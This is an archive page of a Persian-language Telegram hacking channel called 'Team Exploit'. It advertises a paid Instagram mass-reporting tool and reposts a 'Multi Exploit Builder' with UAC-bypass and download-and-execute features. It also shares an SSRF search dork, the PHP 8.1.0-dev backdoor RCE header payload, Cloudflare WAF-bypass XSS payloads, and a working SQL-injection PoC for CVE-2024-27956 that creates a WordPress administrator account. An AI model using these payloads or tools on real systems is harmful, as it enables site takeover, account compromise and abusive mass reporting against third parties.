ar
Feedback
Team Exploit

Team Exploit

الذهاب إلى القناة على Telegram
2 285
المشتركون
لا توجد بيانات24 ساعات
-47 أيام
-930 أيام
أرشيف المشاركات
کانال 2021 میخرید؟ چندتا دارم قیمت بدید ببینم اگه ارزش داره بفروشم پست و ممبر نداره ایدی بیو

بعد از اپدیت قیمت ابزار میره بالا

شب جمعه اپدیت ابزار به خریداران رایگان داده میشه

نوشتم برای خرید پیام دهید چند نفر اومدن میگن بفرست برام😐

و بالاخره ریپورتر اینستاگرام ساخته شد با این ریپورتر میتونید از طریق لاگین با اکانتتون ریپورت بدید یا از طریق ایمیل های رندوم
و بالاخره ریپورتر اینستاگرام ساخته شد با این ریپورتر میتونید از طریق لاگین با اکانتتون ریپورت بدید یا از طریق ایمیل های رندوم گذینه اخر هم مستقیم به پشتیبانی ایمیل میزنه که بزودی به صورت رایگان برای خریداران رایگان داده میشه برای خرید به ایدی داخل بیوگرافی برید!

بررسی آسیب‌پذیری‌های بازنشانی رمز عبور [View] حتما بخونید
بررسی آسیب‌پذیری‌های بازنشانی رمز عبور [View] حتما بخونید

رایتاپ مربوط به "Xss Reflected را چگونه پیدا کردم که منجر به تصاحب حساب در یک وب سایت تجارت الکترونیک می شود" ترجمه شده [View]

رایتاپ مربوط به "تصاحب حساب تصادفی از طریق OAuth پیکربندی نادرست" ترجمه شده [View]

انصافا یکم ادم باشید ابزاری که رایگان براتون میزارم رو نرید کامپایل کنید بفروشید به بقیه من حالا نمیام اسکرین بزارم بگم فلانی و فلانی این کارو کردن، ابروی کسی هم تو این کانال نبردم از اعتماد ممبر هاتون به خودتون خجالت بکشید:/

Repost from esfelurm
Multi Exploit Builder V1 Feature List : UAC Exploit Download and Execute Exploit Windows Shortcut EXploit UAC Exploit Using V
Multi Exploit Builder V1 Feature List : UAC Exploit Download and Execute Exploit Windows Shortcut EXploit UAC Exploit Using Vbs script Using Reg UAC Enable Using Reg File Download and Execute Exploit Reg Hta VBS wfs ps1 url cmd bat Windows Shortcut EXploit wav ps1 png ini txt log mid jpg psc1 dll gif ico dat xml hta cmd jnt mp3 cpl html ppt vbs iso hlp rar ocx zip pptx wfs js doc xls msi pdf url 𝙲𝙷𝙰𝙽𝙽𝙴𝙻 : [@KnightGuardian59]

انصافا هنوز این مثل موشک میزنه

گوگل دورک - SSRF inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com ┌<(
گوگل دورک - SSRF inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

اگر PHP 8.1.0-dev را پیدا کردید، RCE و SQLi را امتحان کنید User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id');
اگر PHP 8.1.0-dev را پیدا کردید، RCE و SQLi را امتحان کنید
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
اینه که بده! ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

Bomber?

پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
<select><style></select>
<svg onload=alert(1)> 
</style>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
<select><style></select>
<svg onload=alert(1)> 
</style>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
<select><style></select>
<svg onload=alert(1)> 
</style>
``` "><img src=x onerrora=confirm() onerror=confirm(1)> ``` ``` <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> ` ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

با این کوئری ها میتونین آخرین توییتهای مربوط به پلتفرم مدنظر خودتون رو در باگ بانتی ببینین روشهای خوبی ارائه میدن ‎ (from:hacker0x01 OR from:bugcrowd OR from:intigriti OR from:yeswehack OR from:synack OR from:hackenproof OR from:zerocopter OR from:immunefi) -filter:replies ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

امروز چند دقیقه وقت گذاشتم تا #آسیب پذیری #امنیتی #افزونه وردپرس خودکار CVE-2024-27956 (اجرای SQL خودسرانه تایید نشده) را تجز
+2
امروز چند دقیقه وقت گذاشتم تا #آسیب پذیری #امنیتی #افزونه وردپرس خودکار CVE-2024-27956 (اجرای SQL خودسرانه تایید نشده) را تجزیه و تحلیل کنم. معلوم شد که بهره برداری از آن بسیار آسان است. در اینجا یک PoC اساسی وجود دارد: از آنجایی که "q" مستقیماً به فراخوانی $wpdb->get_results() ارسال می شود، می توانید دستورات SQL را مستقیماً اجرا کنید. افزودن یک کاربر جدید وردپرس:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW ()، 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
تصویر اول دادن حقوق مدیریت کاربر:
q=INSERT INTO wp_usermeta (user_id، meta_key، meta_value) VALUES (6، 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')، (6 , 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
تصویر دوم ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit

Bricks &lt;= 1.9.6 در برابر اجرای کد از راه دور تایید نشده (RCE) آسیب پذیر است، به این معنی که هر کسی می تواند دستورات دلخواه
Bricks <= 1.9.6 در برابر اجرای کد از راه دور تایید نشده (RCE) آسیب پذیر است، به این معنی که هر کسی می تواند دستورات دلخواه را اجرا کند و سایت/سرور را تحت کنترل خود درآورد. توضیحات کامل: https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6 ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit